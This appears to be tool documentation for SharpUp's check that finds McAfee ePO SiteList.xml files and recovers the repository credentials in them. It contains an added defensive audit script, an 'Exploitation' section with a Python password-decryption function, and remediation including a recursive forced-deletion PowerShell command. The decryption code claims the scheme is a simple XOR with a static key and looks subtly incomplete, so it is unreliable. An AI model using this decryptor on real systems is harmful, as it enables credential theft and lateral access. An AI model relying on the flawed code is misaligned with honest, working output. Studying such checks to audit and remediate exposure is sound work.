Overview

The McAfee SiteList Files check searches for McAfee ePO SiteList.xml files, which contain SuperAgent repository credentials. These credentials are stored encrypted, but the encryption relies on a static key, so anyone who can read the file can recover them and gain unauthorized access to the McAfee update repository.

How It Works

SharpUp searches common locations for SiteList.xml files:
  • C:\Program Files\
  • C:\Program Files (x86)\
  • C:\Documents and Settings\
  • C:\Users\

Technical Details

The SiteList.xml file contains encrypted credentials that the McAfee Agent uses to authenticate to the repository server. The encryption is a weak algorithm keyed with a hardcoded, product-wide value, so the ciphertext offers no real protection once the file is readable.
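The search described under How It Works, recast as a defensive audit that is not part of SharpUp: it walks the same roots for SiteList.xml and reports which repository entries still carry a stored password, without decrypting anything. Element and attribute names (SiteList, HttpSite, UNCSite, Password) are assumed from the SiteList.xml format, and the embedded sample document is constructed.

```python
# Added audit helper (not SharpUp code): find SiteList.xml under the roots
# SharpUp searches and report entries that still carry a stored credential.
# Element names are assumed from the SiteList.xml format; sample is constructed.
import os
import xml.etree.ElementTree as ET

SEARCH_ROOTS = [r"C:\Program Files", r"C:\Program Files (x86)",
                r"C:\Documents and Settings", r"C:\Users"]

def find_sitelist_files(roots=SEARCH_ROOTS):
    """Walk each root and return every SiteList.xml path (case-insensitive)."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root, onerror=lambda e: None):
            hits += [os.path.join(dirpath, f) for f in files if f.lower() == "sitelist.xml"]
    return hits

def audit_sitelist(xml_text):
    """One record per repository site (HttpSite, UNCSite, ...): does it hold a password?"""
    findings = []
    for site in ET.fromstring(xml_text).iter():
        if not site.tag.endswith("Site"):  # skip SiteLists/SiteList wrappers and leaf elements
            continue
        password = (site.findtext("Password") or "").strip()
        findings.append({"site": site.get("Name", "?"),
                         "server": site.get("Server", ""),
                         "stored_credential": bool(password)})
    return findings

# Constructed sample: anonymous fallback site plus a UNC repository with a stored
# password (the base64 value is a placeholder, not a real ciphertext).
SAMPLE_SITELIST = """<ns:SiteLists xmlns:ns="naSiteList" GlobalVersion="1" LocalVersion="1">
  <SiteList Default="1" Name="ExampleSiteList">
    <HttpSite Type="fallback" Name="McAfeeHttp" Server="update.example.invalid:80" Enabled="1">
      <UserName></UserName>
      <Password Encrypted="1"></Password>
    </HttpSite>
    <UNCSite Type="repository" Name="CorpShare" Server="fileserver.example.invalid" Enabled="1">
      <UserName>svc_mcafee</UserName>
      <Password Encrypted="1">UExBQ0VIT0xERVI=</Password>
    </UNCSite>
  </SiteList>
</ns:SiteLists>
"""

if __name__ == "__main__":
    for path in find_sitelist_files():
        print("found:", path)
    for rec in audit_sitelist(SAMPLE_SITELIST):
        print(rec)
```

Entries reported with stored_credential set to True are the ones the Remediation section below applies to.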

Example Output

=== McAfee SiteList.xml Files ===
    C:\Program Files\McAfee\Agent\config\SiteList.xml
    C:\Program Files (x86)\McAfee\Common Framework\SiteList.xml

Exploitation

Decryption

# Python script to decrypt McAfee SiteList passwords
import base64

def decrypt_mcafee_password(encrypted_password: str) -> str:
    """Reverse the SiteList password obfuscation described above:
    base64-decode, then XOR each byte with the repeating static key."""
    # Static XOR key hardcoded in the McAfee Agent
    key = b"<!@#$%^>"
    decoded = base64.b64decode(encrypted_password)

    # XOR byte i with key byte (i mod len(key)); Latin-1 decoding keeps the
    # one-byte-per-character mapping
    decrypted = bytes(b ^ key[i % len(key)] for i, b in enumerate(decoded))
    return decrypted.decode("latin-1")

Remediation

1. Remove SiteList Files

Get-ChildItem -Path C:\ -Recurse -Filter "SiteList.xml" -ErrorAction SilentlyContinue |
    Remove-Item -Force

Note that a managed agent reads its own SiteList.xml to locate its update repository; this step is meant for stale or leftover copies, and a removed file will be regenerated by the agent on its next ePO policy enforcement.

2. Use ePO Managed Deployment

Deploy agents via the ePO server without storing repository credentials locally.